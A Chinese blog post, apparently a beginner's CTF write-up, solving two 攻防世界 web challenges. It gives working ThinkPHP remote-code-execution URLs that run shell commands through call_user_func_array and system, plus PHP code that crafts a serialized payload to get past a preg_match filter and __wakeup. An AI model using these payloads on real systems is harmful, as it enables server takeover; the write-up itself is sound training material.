Web攻防世界(四)

CTF-Web

Web方向(攻防世界——找FLAG)

前期在bilibili学习Web知识、基本漏洞原理、burp、正则表达式的用法…(菜鸟第四天)

php_rce

通过链接查看题目

之前看《web安全攻防》第一章有提及Thinkphp存在远程执行漏洞(Getshell)
在这里插入图片描述

利用find函数

http://220.249.52.133:39404/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20flag

利用cat函数

http://220.249.52.133:39404/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

Web_php_unserialize

本题使用正则表达式对传参进行监控
在这里插入图片描述

4663.png#pic_center)

精简代码为:

<?php 
    class Demo { 
        private $file = 'fl4g.php';//$file改成fl4g.php
    }
    $a= serialize(new demo);
    $a= str_replace('O:4', 'O:+4',$a);//绕过preg_match
    $a= str_replace(':1:', ':2:',$a);//绕过wakeup
    echo base64_encode($a);
    ?>

在这里插入图片描述
即可得到flag
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值